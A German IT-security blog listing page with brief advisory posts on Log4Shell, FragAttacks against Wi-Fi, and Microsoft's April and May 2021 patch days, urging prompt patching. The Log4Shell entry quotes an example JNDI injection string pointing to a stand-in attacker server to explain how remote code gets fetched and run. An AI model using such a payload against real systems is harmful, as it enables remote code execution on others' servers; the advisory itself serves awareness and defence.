Menü: WeBLOG
Menü: WeBLOG
WeBLOG
Einträge pro Seite anzeigen
Anzahl: 163 in IT-Sicherheit vorhanden 
    1 ... 9  10  11  12  13 ... 41    
Log4j und die Log4Shell-Lücke (14.12.2021)
Der Fehler liegt in der "Log4Shell" in der weit verbreiteten Java-Logging-Bibliothek "Log4j". Es lässt sich quasi beliebiger Code ausführen und das dazu noch sehr einfach. In der Java-Welt kommt diese Bibliothek häufig vor, um Prozesse zu protokollieren und etwaige Fehler zu finden.

Das Problem dabei ist, dass "Log4Shell" nicht einfach nur schreibt, sondern darüber hinaus versucht den Protokolltext zu interpretieren. Enthält dieser z.B. die Zeichenfolge "${jndi:ldap://angreifer.server.de/a}", dann ist das Kind in den Brunnen gefallen, weil der Dienst den Server "angreifer.server.de" kontaktiert und von diesem ungefragt Java-Code entgegennimmt und ausführt.


Weiterlesen...

FragAttacks bedrohen fast alle WLAN-Geräte (13.05.2021)
Designprobleme und Fehler in der Umsetzung von WLAN-Standards bzgl. der Behandlung von Frames reissen Lücken in die WLAN-Sicherheit bis einschliesslich WPA3 (Wi-Fi Protected Access = legt das Verfahren zur Anmeldung eines WLAN-Geräts an der WLAN-Basisstation fest).

Ein Angreifer, der sich in Reichweite des Funknetzwerks befindet, könnte so eigene Pakete in ein eigentlich gesichertes WLAN einschleusen, um beispielsweise WLAN-Geräte zu attackieren oder in unzureichend gesicherte, ungepatchte Systeme einzudringen, um diese zu übernehmen (gelingt es gar eine NAT-Firewall zu durchbohren, wäre dies besonders heikel für das gesamte Netzwerk).


Weiterlesen...

Microsoft Mai-Patchday (12.05.2021)
Mit dem kumulativen Update für den Mai 2021 schliesst Microsoft 55 Sicherheitslücken, von denen 4 als "kritisch" eingestuft sind. Als besonders gefährlich gilt die Schwachstelle (CVE-2021-31166) im HTTP Protocol Stack (http-sys), die Windows 10 2004 und 20H2 sowie Windows Server 20H2 betrifft. Ausnutzbar ist das Leck aus der Ferne (Remotecode-Execution), wenn es gelingt präparierte Pakete an das verwundbare System zu schicken (siehe Warnmeldung von Microsoft). Danach kann der Rechner komplett übernommen werden.

Die Patches sollten deshalb zeitnah installiert werden!


Microsoft April-Patchday (14.04.2021)
Für Windows 10 (20H2) wurde das kumulative Update KB5001330 am 13.04.2021 veröffentlicht und kann über Windows-Update bezogen werden. Dieses enthält auch die Bugfixes aus KB5000842 und das Drucken-Problem (BSOD) sollte nicht mehr auftauchen.

Insgesamt wurden viele Schwachstellen und kritische Sicherheitslücken beseitigt, weshalb der Patch zeitnah installiert werden sollte.

    1 ... 9  10  11  12  13 ... 41